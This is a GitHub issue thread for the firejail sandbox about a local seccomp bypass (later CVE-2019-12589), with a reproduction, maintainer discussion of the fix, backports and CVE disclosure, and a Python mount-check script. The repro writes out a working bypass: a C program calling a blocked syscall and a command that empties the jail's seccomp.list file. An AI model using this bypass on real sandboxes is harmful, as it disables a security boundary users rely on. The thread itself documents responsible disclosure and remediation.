
seccomp bypass when joining existing jail #2718

Closed
apmorton opened this issue May 21, 2019 · 27 comments

@apmorton (Contributor) commented May 21, 2019

seccomp filters are copied into /run/firejail/mnt, and are writable within the jail.

A malicious process can modify files from inside the jail.
Processes that are later joined to the jail will not have seccomp filters applied.

repro steps

compile program to call blacklisted syscall

gcc -xc - <<EOF
#include <stdio.h>
#include <sys/klog.h>

int main(void) {
    printf("calling syslog syscall\n");
    /* klogctl() is implemented with the syslog syscall; the sandbox's seccomp
     * filter is expected to kill the process here, so the next line is only
     * reached when the filter is not in effect. */
    klogctl(1, NULL, 0);
    printf("not killed\n");
    return 0;
}
EOF

create interactive jail session

$ firejail --quiet --name=jail

try to run program inside jail, noting syscall is blocked

$ ./a.out
calling syslog syscall
Bad system call (core dumped)

open new terminal and run program by joining jail, noting syscall is blocked

$ firejail --quiet --join=jail ./a.out
calling syslog syscall

back in original interactive jail session, empty the seccomp.list file and attempt to run program, noting syscall is blocked

$ echo -n "" > /run/firejail/mnt/seccomp.list
$ ./a.out
calling syslog syscall
Bad system call (core dumped)

open new terminal and run program by joining jail, noting syscall is NOT blocked

$ firejail --quiet --join=jail ./a.out
calling syslog syscall
not killed
@chiraag-nataraj (Collaborator) commented May 21, 2019

echo -n "" > /run/firejail/mnt/seccomp.list

This fails for me with bash: /run/firejail/mnt/seccomp.list: Permission denied. Let me play around a bit, since idk if it's only a "my system" thing.

Which version of firejail are you running? Which distro?

@chiraag-nataraj (Collaborator) commented May 21, 2019

Okay, so I can replicate with current release, but not with current git master. Is that the same for you @apmorton?

@apmorton (Contributor, Author) commented May 21, 2019

confirmed, this is fixed on latest master.

seccomp files are put in /run/firejail/mnt/seccomp, which is mounted as a read-only filesystem, and that mitigates the issue.
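A way to verify on an installed version whether the seccomp files are actually protected the way the fix above describes, covering both the original report's layout and the fixed layout. This is an added check, not code from firejail or from anyone in this thread; the two file paths are assumed from the layouts mentioned above, and the sample mount tables are constructed.

```python
import os

# Assumed file locations (not from firejail's source): the pre-fix layout from
# the repro above and the post-fix layout from the follow-up comment.
PRE_FIX_PATHS = ["/run/firejail/mnt/seccomp.list"]
POST_FIX_PATHS = ["/run/firejail/mnt/seccomp/seccomp.list"]

# Constructed sample mount tables in /proc/self/mounts format (not captured
# from a real host): writable tmpfs only, and the seccomp dir on its own ro mount.
VULNERABLE_MOUNTS = "tmpfs /run/firejail/mnt tmpfs rw,nosuid,nodev,relatime 0 0\n"
FIXED_MOUNTS = VULNERABLE_MOUNTS + (
    "tmpfs /run/firejail/mnt/seccomp tmpfs ro,nosuid,nodev,relatime 0 0\n")

def parse_mounts(text):
    """[(mountpoint, {options})] from /proc/self/mounts content; fields are
    source mountpoint fstype options dump pass (\\040 escapes not decoded)."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4:
            entries.append((fields[1], set(fields[3].split(","))))
    return entries

def mount_for(path, mounts):
    """Longest mount point covering path, matched on a path boundary so that
    /run/firejail/mnt/seccomp does not claim /run/firejail/mnt/seccomp.list."""
    best = None
    for mountpoint, opts in mounts:
        if path == mountpoint or path.startswith(mountpoint.rstrip("/") + "/"):
            if best is None or len(mountpoint) > len(best[0]):
                best = (mountpoint, opts)
    return best

def unprotected(mounts_text, paths):
    """Paths that the mount table does not place on a read-only mount."""
    mounts = parse_mounts(mounts_text)
    result = []
    for p in paths:
        m = mount_for(p, mounts)
        if m is None or "ro" not in m[1]:
            result.append(p)
    return result

def check_host(paths=PRE_FIX_PATHS + POST_FIX_PATHS):
    """Live check from inside a jail: mount table plus a direct write probe."""
    with open("/proc/self/mounts") as f:
        bad = set(unprotected(f.read(), paths))
    return {p: {"read_only_mount": p not in bad, "writable": os.access(p, os.W_OK)}
            for p in paths if os.path.exists(p)}
```

Call check_host() from a process running inside the sandbox; an entry reporting read_only_mount False or writable True means the filter files are still exposed the way the report describes.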

@chiraag-nataraj (Collaborator) commented May 21, 2019

In the future, if you think you have found a security vulnerability (which this certainly would qualify as), you should probably follow the directions in the readme (i.e. email netblue30).

@chiraag-nataraj (Collaborator) commented May 21, 2019

@netblue30, this is fixed in git master, but apparently is an issue in the current release. How should we proceed?

@apmorton (Contributor, Author) commented May 21, 2019

neither readme (README or README.md) has security disclosure procedures

edit: just noticed in CONTRIBUTING.md, apologies

@chiraag-nataraj (Collaborator) commented May 21, 2019

I'll add it to the README as well, since people might not think to look at CONTRIBUTING.

@chiraag-nataraj (Collaborator) commented May 22, 2019

@apmorton, if you're comfortable, can you bisect the commits to figure out which one solved this? We should probably back-port just that fix...

@smitsohu (Collaborator) commented May 22, 2019

It is commit eecf35c

@chiraag-nataraj (Collaborator) commented May 22, 2019

Thanks @smitsohu! Should we back-port to LTS and current release?

@smitsohu (Collaborator) commented May 22, 2019

@chiraag-nataraj We already have a new release candidate, and 0.9.58 will be replaced very soon anyways.

LTS is a different story, imho it should be backported. What does @startx2017 think?

@SkewedZeppelin (Collaborator) commented May 22, 2019

What about getting a CVE assigned?
And many distros still aren't even shipping 0.9.58.

@smitsohu (Collaborator) commented May 22, 2019

What about getting a CVE assigned?
And many distros still aren't even shipping 0.9.58.

@netblue30 ?

@SkewedZeppelin (Collaborator) commented May 22, 2019

this fine?

Subject: local seccomp bypass in firejail before 0.9.60-rc1

Austin Morton has discovered a local method to bypass/disable seccomp
filters of a firejail sandbox.

Versions of firejail before 0.9.60-rc1 or eecf35c2 do not mark seccomp
files read-only which allows overwriting them, once overwritten any
processes joined to the existing sandbox will not have seccomp enforced.
This can allow for a denial of service or elevation of privileges.

Reported here:
https://github.com/netblue30/firejail/issues/2718

Fixed in this commit:
https://github.com/netblue30/firejail/commit/eecf35c2

Compile tested backports for LTS, 0.9.52, 0.9.54, 0.9.56, and 0.9.58.2 are
available here:
https://github.com/netblue30/firejail/issues/2718#issuecomment-495010478

@smitsohu (Collaborator) commented May 22, 2019

Pending backport to LTS and other versions.

More a side note: So far we as upstream only support the last version and LTS, and I tend to believe this is a wise decision. I'd say for earlier versions it is the maintainers job to backport fixes, in line with their respective distribution policy.

@SkewedZeppelin (Collaborator) commented May 22, 2019

@smitsohu
okay updated, would you like to send it to the oss-security list?

@SkewedZeppelin (Collaborator) commented May 22, 2019

I have done some backports here
https://gist.github.com/SkewedZeppelin/7f67a131a3d31bfa9d64eaf1a72b1971

edit: attached as a zip for archival purposes
eecf35c-backports.zip

@smitsohu (Collaborator) commented May 23, 2019

asked MITRE for a CVE number

@netblue30 netblue30 added the bug label May 26, 2019

@netblue30 (Owner) commented May 26, 2019

Thanks @apmorton

New release Monday morning. If you want to bring in any other fix, now is the time. If we don't get a CVE number by Monday, we'll add it later. I'll grab the patch from @SkewedZeppelin and add it in etc-fixes directory here on mainline. For LTS a new release probably sometime next week, there are some more fixes to be added there, I'll have to talk to @startx2017.

@rusty-snake (Collaborator) commented May 26, 2019

The RELNOTES should be updated, we have some new stuff like private-cwd or deterministic-exit-code and so on.

@netblue30 (Owner) commented May 26, 2019

RELNOTES done, anything missing just add it in. I'm doing some testing right now, tonight or tomorrow morning it should be out.

@reinerh (Collaborator) commented May 30, 2019

@smitsohu Was there already a reply regarding CVE number?

Edit: Did you use this form? https://cveform.mitre.org/

@smitsohu (Collaborator) commented May 30, 2019

@reinerh We have no number assigned yet.

Yes, I used the webform. I think I'm going to ask if there is something we can do on our end to speed up the process.

@netblue30 (Owner) commented May 30, 2019

@startx2017 started porting, we will have a LTS release by the end of the week with or without CVE.

@reinerh (Collaborator) commented May 30, 2019

(FYI a backported fix is in Debian unstable since yesterday, together with a fix for #2401; and it has been unblocked for migration to Buster.)

@reinerh reinerh added the security label May 31, 2019

@carnil commented Jun 3, 2019

CVE-2019-12589 was assigned for this issue.

@netblue30 (Owner) commented Jun 8, 2019

LTS version also released, CVE status page updated - https://firejail.wordpress.com/download-2/cve-status/

@netblue30 netblue30 closed this Jun 8, 2019
